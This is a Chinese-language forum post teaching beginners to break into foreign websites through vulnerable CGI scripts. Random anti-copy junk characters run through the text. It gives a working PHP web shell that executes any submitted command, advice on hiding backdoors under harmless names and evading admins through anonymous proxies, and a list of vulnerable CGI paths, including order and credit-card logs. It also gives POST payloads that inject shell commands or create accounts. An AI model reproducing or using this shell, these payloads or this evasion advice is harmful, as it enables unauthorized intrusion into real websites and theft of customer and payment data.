CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
& x- i# c7 K0 M2 e大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
  w: D5 [( _% F" l' c9 _& e这里让我感觉 很有技术交流的感觉
我会长长来玩的
5 p- c! L$ ^- w2 m8 M1 v9 S- w$ O( \, L+ j前言:
2 \8 f  f7 l  p3 r. z以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
& s3 V; L0 Q1 }$ A9 I1 f所以有很多网站程序有6成都会使用cgi 脚本来管理
- O& }( P7 ?$ J目录为/cgi-bin/
6 j2 o! c) a1 r9 r  u. i1 V
只是个人在实务上一些经验
7 L5 ^# D7 C5 ?6 I4 ], T写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
3 e5 N9 G8 D+ f1 |9 Y+ K讲解一下
0 H8 i! ?1 n- B让没有基础的人很容易上手

+ d( d) q. {9 _* f5 R5 d( S以下内容跟帖回复才能看到
==============================
8 a' L6 }! U) |: J7 w& I
第1部份: 何谓Shell?
Shell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
* S& u7 Y/ l9 K, f/ y/ O意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
6 p, Y3 s5 |! B; B2 k7 i要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

; W: F# P! Y1 u0 C第2部份: Unix 指令
; {* c( o* A! O5 h7 {5 b5 k以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
1 K( a3 N# H& h: X4 j+ U# A3 ils -al :详细列出档案资料(当前目录)
1 w: ^: t* b4 N: sls /: 列出根目录
  q. w6 w0 ]0 K  y9 j+ ^  Yls /etc: 列出/etc的资料夹及档案
- R: U! o5 v  A& p+ D; l6 Zls ../ -al: 详细列出上一层的资料夹及档案
- s4 B, \% d& z) ocat: 显示档案内容
3 B, m; P3 Y. `7 jcat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
man: 显示指令用法  
man ls: 显示ls这指令的用法  
' _! E$ E& k7 Y2 A; r9 Qmkdir 建立目录
rmdir 删除目录
/ M9 J' C+ Q+ S  c  ], Amv 移动档案
rm 删除档案
; x, d' t( L- \
9 B: G: ]& O2 E% O5 T& `5 D第3部份: Shell的使用
例如:
! s* g# p% {0 o; Khttp://site.com/refer.php
% `; F& F2 h* v. Z# y这是我的後门, 原代码如下:
, ~. N1 H! e  `. S<Form Action="#" Method="POST">
<Input type="text" name="cmd">
  A) F+ a: q; J7 l) Z. i8 b<Input type="Submit">
</Form>
) Q+ K  G1 D1 F) A/ j: ]<?php
  q1 }3 P0 W2 ]' j0 \; v$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
  P3 D& C6 C+ \5 Y?>
输入pwd, 可得到绝对路径:
3 ]5 m6 u/ k8 O+ j7 N4 {/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

第4部份: 注意事项
& v" c8 q+ N2 [' C0 Y& v' A. r- 使用匿名代理, 保障自己
1 s/ ^* i! @, B( Z1 I5 w" x- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
2 a5 p- ?, V& M2 ]0 w( B- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
7 `1 j( D7 }# S* E% H8 X- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
: C$ Q' y$ g* O- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
8 c- C, ^  G  c) q# Z针对网站的渗透分析方法太多了
  G# b- {" _% Z, s9 w这篇文章的重点是cgi 脚本攻击
+ ]4 s3 T& K: C所以我用简单的叙述形容
开始讲解脚本入侵过程:
2 R& m  o6 L& _* Y7 ?5 B" q0 x3 I在这里提供一些方法思路让大家学习一下

3 Z9 A2 d0 q7 J  f" u% n# |' @1.一开始对一个网站进行cgi漏洞扫描
( e9 s6 g9 u. c% X# o; g我们需要的东西有
扫洞工具 如:triton..等等
' y! Z1 _* a/ g& k1 qE表
如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
) G+ Y& N- W% i+ I: ]" }7 J/Admin_files/order.log
( [8 d* ]* G1 @6 t6 e/orders/mountain.cfg
. b: e6 B5 T4 q6 c; i5 i' M5 p/cgi-sys/cart.pl
/scripts/cart.pl
4 j6 x9 P9 Q* S4 r( D/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day

  {( W# Y7 K' c8 F0 U& v: e1 E2.怎样确认扫到的洞 是真的还假的?
7 x. T" O- l7 g举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
; ?4 p# v5 q. m8 ?3 z( nERROR:This script should be referenced with a METHOD of POST.
( q4 W, A- O# N; j) M' x- |; r% t没有返回一定是假的
+ l5 e! }% K  B+ R+ l3.重来来了 很多人都会问我
9 |' f' j/ K$ N( t8 |3 ^他扫到很多洞 但是不会使用
+ x5 d, ^& M$ }; l因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
可以是源代码分析 找出介质
0 g) _! n$ N6 i; U1 O; g% ]. u或是用抓包工具 抓他的语法...等等
( i* ^0 c  k) h6 s
% ~6 e6 M4 L# o3 J以下我提供10个 cgi 洞以及使用方法post
3 U6 K" c+ I' h2 H, o6 N" k让大家可以针对网站去做扫描  
/index.cgi
wei=ren&gen=command
/passmaster.cgi
Action=Add&Username=Username&Password=Password
6 t6 I# p- A4 q5 g5 K  @8 }/accountcreate.cgi
% n% s# w/ ?. U. }) `6 ~username=username&password=password&ref1=|echo;ls|
/form.cgi
( N4 Y; y4 O  J; i. l( Oname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
" K, |5 U5 c& q& Q/cgi-bin/EuroDebit/addusr.pl
0 {1 V2 F' ?9 c; k' U/ muser=username&pass=Password&confirm=Password
/ccbill-local.asp
post_values=username:password
0 i; u0 t. F+ d9 j0 n/count.cgi
; I* @4 t) x  \8 spinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
% n( y; D1 M" V3 s' {& d( wsearchoption=1&searchfor=|echo;ls -al;exit|
2 E' Z/ c1 K) P6 G. ~/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
. `5 v  i& N( g/af.cgi_browser_out=|echo;ls -la;exit;|

今天就讲到这  感谢大家支持